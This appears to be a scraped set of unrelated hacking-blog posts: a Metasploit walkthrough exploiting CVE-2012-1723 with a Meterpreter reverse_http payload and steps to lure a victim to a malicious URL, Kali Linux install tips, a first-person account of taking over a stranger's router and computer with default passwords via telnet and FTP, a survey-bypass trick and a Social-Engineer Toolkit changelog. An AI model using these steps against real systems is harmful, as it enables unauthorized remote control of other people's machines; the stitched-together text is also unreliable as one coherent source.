Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

Attacker Machine: Backtrack
Victim Machine: Windows (install JRE un-patched version  )

Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:

msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:

POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
Metasploit Module: http://www.exploit-db.com/exploits/19717/

How to Install Software's in Kali Linux

Kali Linux is the next generation and advance version of Backtrack Linux, it is more stable, secure and upgraded version of Linux based on Debian. It has been designed for Penetration Tester and Information Security professional and students, it contains all the necessary tools to conduct a successful penetration testing on web application, network, VoIP and WiFi.

Beside ethical hacking tools, a Linux distribution must have necessary utilities and software's so that it can become the first desktop operating system. Kali Linux is stable and it can load required drivers automatically, and it also has Add/Remove Software utility from where you can manage your software's. It already has necessary tools installed from Document viewer to VLC player, but some tools that are required for a desktop computing are not installed and you need to install / configure them by yourself.

This article is the discussion of software's installation in Kali Linux, you can install as many software's as you want but I will discuss the installation of some important software's for example:

Skype (for communication)
Open Office
Flash

When Backtrack 5 was launched, we have discussed the installation of important software's on it but now the time has changed and we have Kali Linux so we will discuss the installation on it.

How to Install Skype in Kali Linux
The first step is to get Skype from its official website, make sure to select your distribution carefully. For Kali choose Ubuntu 10.04 and download it.

After downloading open terminal and locate the download directory, and install it by using dpkg -i command:

Root@ehacking:~/Downloads# sudo dpkg -i skype-ubuntu-lucid_4.1.0.20-1_i386_001.deb

How to Install Open Office in Kali Linux

Open office is a wonderful alternate of MS office, the easiest way to install open office is by using terminal and command "apt-get install openoffice.org" but one of our user has discussed about the repositories problem in Kali Linux. We have also seen that the debain repositories is not working properly hence you cannot install packages by using the terminal. The solution is as follows:

Necessary changes are required for Apt Repositories, kindly follow the steps mentioned below:

root@ehacking:~# cd ..
root@ehacking:/# ls
bin   etc         lib         mnt   root  selinux  tmp  vmlinuz
boot  home        lost+found  opt   run   srv      usr
dev   initrd.img  media       proc  sbin  sys      var
root@ehacking:/# cd etc/apt
root@ehacking:/etc/apt# nano sources.list 

Important: Do not delete the lines that are already present on the source file, just add the following repositories in this file:

deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main/debian-installer
deb http://http.kali.org/kali kali main contrib non-free
deb-src http://http.kali.org/kali kali main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Press CTRL O than enter and than CTRL X for exist, you are almost done. Next step is to update your Linux, on terminal type apt-get update
Now it is very easy to install software's by using terminal for Office type:

# apt-get install openoffice.org

How to Install Flash in Kali Linux

# apt-get install flashplugin-nonfree

Now your Kali is ready to install as many software's as you want.

How I Hacked A Remote Computer By Just IP Address

Hacking a remote computer is always a hot topic among hackers and crackers, a newbie hacker or someone who wants to learn hacking always ask these questions that how to hack into a computer by just knowing the IP address. Although we have discussed so many methods before and I always insist to learn some basic commands, protocols and their usage. This is my story like I have hacked into a remote by just using IP address (I have not downloaded any file even I have not cleared the logs). This story was not planned it just happened and I am sure you will like it and you will learn a lot of things if you don't know the basic commands and protocols.

It was Saturday night and I was working hard on social engineering toolkit remote attack (WAN,Internet attack) that is why I was playing with my router for port forwarding and other stuffs, remember my ISP using a dynamic mechanism so I have created DNS server to get the static IP. It was almost night and I have decided to get some sleep and than I have saved my browser tabs so that next time I will use them.

Its Sunday evening I have opened my browser and the previous tabs open automatically and then I got pop up window it asked about the user-name and password of my router I have looked to the address bar the IP address was same as it was saved by me, I was shocked that my ISP has not changed my WAN IP (remember ISP using dynamic IP), after this I have open a website about whatismyip and I have seen that my IP is different it means the window that ask about user name and password is the IP of another computer.

Just got an idea why not to brute force it and get the access on the victim router, hydra has been discussed before, but before brute force I have decided to use guessing technique and I than I have entered so many combination but failed than I just used the default user name and password huurraaah I was in.

Security was very low, than I did a quick nmap scan to get the open ports (remember I have turned off the firewall of victim router). According to the nmap result ftp and telnet was open and then I realized how vulnerable this victim is.

I came across to my terminal and open telnet to the victim by using the default password and I was in and now I was able to take control of this computer but this was not include in the plan.

FTP (file transfer protocol), I came to my terminal again and this time I have used FTP command with the same combination of user name and password and successful. Remember FTP access means you can download and upload files on remote computer means full access. You can use some GUI ftp client but I used command.

Countermeasure

Always use a strong password
Turn on your Firewall (both on router and computer)

BYPASS SURVEYS'

BYPASS ''SURVEYS''

BYPASS THE ''SURVEYS'' WITHOUT DISCLOSING YOUR PERSONAL INFORMATION!

We often come across sites in which we have to forcefully do a survey because we have to download a file or see some content.
In all of these surveys we are forced to disclose our personal information like our phone number , email id  etc.
Later these sites irritate you with their sms's spam mails of offers in which you not at all are  interested !
So i've found a way by which you can get through these sites without leaking out your personal information !
Let's start -

1.Download this add on called ''greasemonkey'' for mozilla firefox (mozilla is needed ).
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ 

After installing it,it would appear like this in your browser -

2.After installing it download this script which runs with the help of this add on(greasemonkey) --
http://userscripts.org/scripts/show/2560
Install this script and make sure the monkey on the right side of your mozilla screen is colored (which means greasemonkey is activated,to activate or deactivate just click on it)
3.Now go to the site which tells you to do the survey and asks for your information  etc..
4.You'll see an option on top left side of the page which says '' Press CTRL+SHIFT+F to fill in form. ''

Do as directed..press  CTRL+SHIFT+F and you will see that the form gets filled on its own and all the information filled out there is completely random !
Click on submit and you are registered on the site and now you can easily download what you wanted to ! :)

BUT
6.Some sites may tell you to verify your identity by logging into your mail and opening some url or to get some pin ! For this all you have to so is go to http://www.yopmail.com/en/ .Go to this site and you'll get a temporary email id for around 15-30min.>paste that temporary email id at the place of email id which your intelligent form filler has randomly filled>click on submit form.

Here ''yoyo@yopmail.com'' is the yopmail email id which is replaced by the default id given by ''form filler''
7.Check http://www.yopmail.com/en/ Inbox for the mail from the site>Get the pin or confirmation link>you are done !:-)

Here as you can see two mails from the site where we have to forcefully register and the confirmation link plus password (other mails are just spam,ignore them).

8.Some sites may ask you for voice calls confirmation ..I have the solution for that too :)
In that case go to this site http://www.k7.net/..on this site you can receive voice calls via mail ! So you bypass Survey again without giving any details !

 

Register here and you'll be able to receive voice calls via mail.

The Social-Engineer Toolkit v1.4

Social-Engineer Toolkit v1.4 latest Version !

The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Official change log:
Java changed how self signed certificates work. It shows a big UNKNOWN now, modified self sign a bit.
Added the ability to purchase a code signing certificate and sign it automatically. You can either import or create a request.
Fixed a bug in the wifi attack vector where it would not recognize /usr/local/sbin/dnsspoof as a valid path
Fixed a bug in the new backtrack5 to recognize airmon-ng
Added the ability to import your own code signed certificate without having to generate it through SET
Fixed an issue where the web templates would load two java applets on mistake, it now is correct and only loads one
Fixed a bounds exception issue when using the SET interactive shell, it was using pexpect.spawn and was changed to subprocess.Popen instead
Added better import detection and error handling around the python module readline. Older versions of python may not have, if it detects that python-readline is not installed it will disable tab completion
Added a new menu to the main SET interface that is the new verified codesigning certificate menu
Fixed a bug with the SET interactive shell that if you selected a number that was out of the range of shells listed, it would hang. It now throws a proper exception if an invalid number or non-numeric instance is given for input
Added more documentation around the core modules in the SET User_Manual
Updated the SET_User manual to reflect version 1.4
 Download The Social-Engineer Toolkit v1.4 Here